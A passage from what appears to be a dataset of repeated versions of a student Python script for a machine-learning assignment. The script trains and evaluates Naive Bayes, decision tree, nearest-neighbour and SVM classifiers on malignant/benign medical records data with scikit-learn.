\n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. 
\n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\ndef print_introduction(team_array):\n \"\"\"\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n \"\"\"\n print('\\n\\n***************************************************************'\n )\n print(' CAB320 ASSIGNMENT 2: MACHINE LEARNING ')\n print('***************************************************************')\n print('\\nTEAM MEMBERS:')\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0], ':', person[1],\n person[2]))\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. 
\n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\nif __name__ == '__main__':\n class_labels = 'Malignant', 'Benign'\n path_to_data = 'medical_records.data'\n test_set_ratio = 0.2\n function_list = [build_NB_classifier, build_DT_classifier,\n build_NN_classifier, build_SVM_classifier]\n print_introduction(my_team())\n data, labels = prepare_dataset(path_to_data)\n train_data, test_data, train_labels, test_labels = (model_selection.\n train_test_split(data, labels, test_size=test_set_ratio,\n random_state=1))\n print(\n '\\n\\nTraining set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'\n .format((1 - test_set_ratio) * 100, len(train_data), sum(\n train_labels), sum(train_labels) * 100 / len(train_data)))\n print('Test set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.\n format(test_set_ratio * 100, len(test_data), sum(test_labels), sum(\n test_labels) * 100 / len(test_data)))\n for function in function_list:\n if function is build_NB_classifier:\n t0 = time.time()\n clf, cv_results = function(train_data, train_labels)\n print_cv_report(cv_results)\n else:\n t0 = time.time()\n clf = function(train_data, train_labels)\n print_grid_search_report(clf)\n plot_grid_search_results(clf)\n t1 = time.time()\n print(\n '\\nCross-validation, optimization, and fitting took {:.6f} seconds total.'\n .format(t1 - t0))\n pred_train_labels = clf.predict(train_data)\n t2 = time.time()\n print('\\n\\n- - - TRAINING REPORT - - -')\n print_prediction_report(pred_train_labels, train_labels, class_labels)\n print('\\nPrediction on training set took {:.6f} seconds.'.format(t2 -\n t1))\n t3 = time.time()\n pred_labels = clf.predict(test_data)\n t4 = time.time()\n print('\\n\\n- - - TEST REPORT - - -')\n print_prediction_report(pred_labels, test_labels, class_labels)\n print('\\nPrediction on test set took {:.6f} seconds.'.format(t4 - t3))\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\ndef build_NB_classifier(X_training, y_training):\n \"\"\" \n Build a Naive Bayes classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n nbc: the naive bayes classifier built in this function\n results: the dict of scores returned by cross validation, since \n GridSearchCV would also return this but it cannot be used for \n NB with no hyperparameter to optimize, and CV must be done before\n fitting takes place (and fitting happens here)\n \"\"\"\n print_clf_intro('NAIVE BAYES')\n nbc = naive_bayes.MultinomialNB()\n results = model_selection.cross_validate(nbc, X_training, y_training,\n return_train_score=True, scoring=['accuracy', 'precision',\n 'roc_auc', 'recall', 'f1'])\n nbc.fit(X_training, y_training)\n return nbc, results\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\ndef build_NN_classifier(X_training, y_training):\n \"\"\" \n Build a Nearrest Neighbours classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed. \n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n knn: the k-nearest neighbors classifier built in this function (i.e. 
a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'n_neighbors': np.linspace(1, 200, 200, dtype=int)}\n print_clf_intro('NEAREST NEIGHBOR', params)\n knn = model_selection.GridSearchCV(neighbors.KNeighborsClassifier(),\n params, return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n knn.fit(X_training, y_training)\n return knn\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. 
This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. \n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\ndef print_introduction(team_array):\n \"\"\"\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n \"\"\"\n print('\\n\\n***************************************************************'\n )\n print(' CAB320 ASSIGNMENT 2: MACHINE LEARNING ')\n print('***************************************************************')\n print('\\nTEAM MEMBERS:')\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0], ':', person[1],\n person[2]))\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. 
\n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\nif __name__ == '__main__':\n class_labels = 'Malignant', 'Benign'\n path_to_data = 'medical_records.data'\n test_set_ratio = 0.2\n function_list = [build_NB_classifier, build_DT_classifier,\n build_NN_classifier, build_SVM_classifier]\n print_introduction(my_team())\n data, labels = prepare_dataset(path_to_data)\n train_data, test_data, train_labels, test_labels = (model_selection.\n train_test_split(data, labels, test_size=test_set_ratio,\n random_state=1))\n print(\n '\\n\\nTraining set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'\n .format((1 - test_set_ratio) * 100, len(train_data), sum(\n train_labels), sum(train_labels) * 100 / len(train_data)))\n print('Test set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.\n format(test_set_ratio * 100, len(test_data), sum(test_labels), sum(\n test_labels) * 100 / len(test_data)))\n for function in function_list:\n if function is build_NB_classifier:\n t0 = time.time()\n clf, cv_results = function(train_data, train_labels)\n print_cv_report(cv_results)\n else:\n t0 = time.time()\n clf = function(train_data, train_labels)\n print_grid_search_report(clf)\n plot_grid_search_results(clf)\n t1 = time.time()\n print(\n '\\nCross-validation, optimization, and fitting took {:.6f} seconds total.'\n .format(t1 - t0))\n pred_train_labels = clf.predict(train_data)\n t2 = time.time()\n print('\\n\\n- - - TRAINING REPORT - - -')\n print_prediction_report(pred_train_labels, train_labels, class_labels)\n print('\\nPrediction on training set took {:.6f} seconds.'.format(t2 -\n t1))\n t3 = time.time()\n pred_labels = clf.predict(test_data)\n t4 = time.time()\n print('\\n\\n- - - TEST REPORT - - -')\n print_prediction_report(pred_labels, test_labels, class_labels)\n print('\\nPrediction on test set took {:.6f} seconds.'.format(t4 - t3))\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\ndef build_NB_classifier(X_training, y_training):\n \"\"\" \n Build a Naive Bayes classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n nbc: the naive bayes classifier built in this function\n results: the dict of scores returned by cross validation, since \n GridSearchCV would also return this but it cannot be used for \n NB with no hyperparameter to optimize, and CV must be done before\n fitting takes place (and fitting happens here)\n \"\"\"\n print_clf_intro('NAIVE BAYES')\n nbc = naive_bayes.MultinomialNB()\n results = model_selection.cross_validate(nbc, X_training, y_training,\n return_train_score=True, scoring=['accuracy', 'precision',\n 'roc_auc', 'recall', 'f1'])\n nbc.fit(X_training, y_training)\n return nbc, results\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\ndef build_NN_classifier(X_training, y_training):\n \"\"\" \n Build a Nearrest Neighbours classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed. \n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n knn: the k-nearest neighbors classifier built in this function (i.e. 
a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'n_neighbors': np.linspace(1, 200, 200, dtype=int)}\n print_clf_intro('NEAREST NEIGHBOR', params)\n knn = model_selection.GridSearchCV(neighbors.KNeighborsClassifier(),\n params, return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n knn.fit(X_training, y_training)\n return knn\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. 
This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. \n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\ndef print_introduction(team_array):\n \"\"\"\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n \"\"\"\n print('\\n\\n***************************************************************'\n )\n print(' CAB320 ASSIGNMENT 2: MACHINE LEARNING ')\n print('***************************************************************')\n print('\\nTEAM MEMBERS:')\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0], ':', person[1],\n person[2]))\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. 
\n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\ndef build_NB_classifier(X_training, y_training):\n \"\"\" \n Build a Naive Bayes classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n nbc: the naive bayes classifier built in this function\n results: the dict of scores returned by cross validation, since \n GridSearchCV would also return this but it cannot be used for \n NB with no hyperparameter to optimize, and CV must be done before\n fitting takes place (and fitting happens here)\n \"\"\"\n print_clf_intro('NAIVE BAYES')\n nbc = naive_bayes.MultinomialNB()\n results = model_selection.cross_validate(nbc, X_training, y_training,\n return_train_score=True, scoring=['accuracy', 'precision',\n 'roc_auc', 'recall', 'f1'])\n nbc.fit(X_training, 